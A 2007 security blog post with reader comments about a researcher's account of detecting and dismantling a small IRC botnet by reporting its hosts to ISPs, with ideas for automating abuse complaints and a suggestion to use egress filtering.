Botnet Destruction - A Drama
I got an email from B10m today pointing me to a very interesting blog post he wrote about destroying a botnet. This is actually pretty interesting because he takes it from the very first step (detecting the attack) to logging into the IRC server, to communicating with the OPs, trying to get himself banned to prevent his IP of his server from communicating with the IRC server, to taking down the individual servers that were hosting the files as well as taking down the IRC server.
Although it was a relatively small botnet in the grand scheme of things it’s still pretty interesting to see this happen. I always wondered if the operators simply told the bots to listen to another IRC server elsewhere and log off, it’s still a fascinating story. The economics of creating a robot to follow the links and do automatics submissions to abuse@ the ISP in question aren’t that terrible. If there were money in it, I’m sure other people would be interested in doing this. Beyond that it’s an oddity. Although it may be interesting to write an Apache module to do this on your behalf. It might make the botnets stop scanning your network for fear of reprisal.
January 16th, 2007 at 11:25 am
First of all, thanks for the plug!
I’ve looked into the possibility of automating this, but due to the awkward includes of other files, it’d be hard to fully automate (I made a rough draft for complaining for this specific case, like logging into the IRC server, seeing what IPs were infected, looking up the sysadmin’s mail addresses etc.)
Of course, these script kiddies found a new host to launch their attacks from, but by now, their botnet is crumbling again
I’d love to see other people’s solutions for automating complaints though!
January 17th, 2007 at 4:50 am
Much easier to just block outbound connections from your host on the firewall. Why would your webserver ever have a reason to connect to an IRC server… Egress filtering is your friend.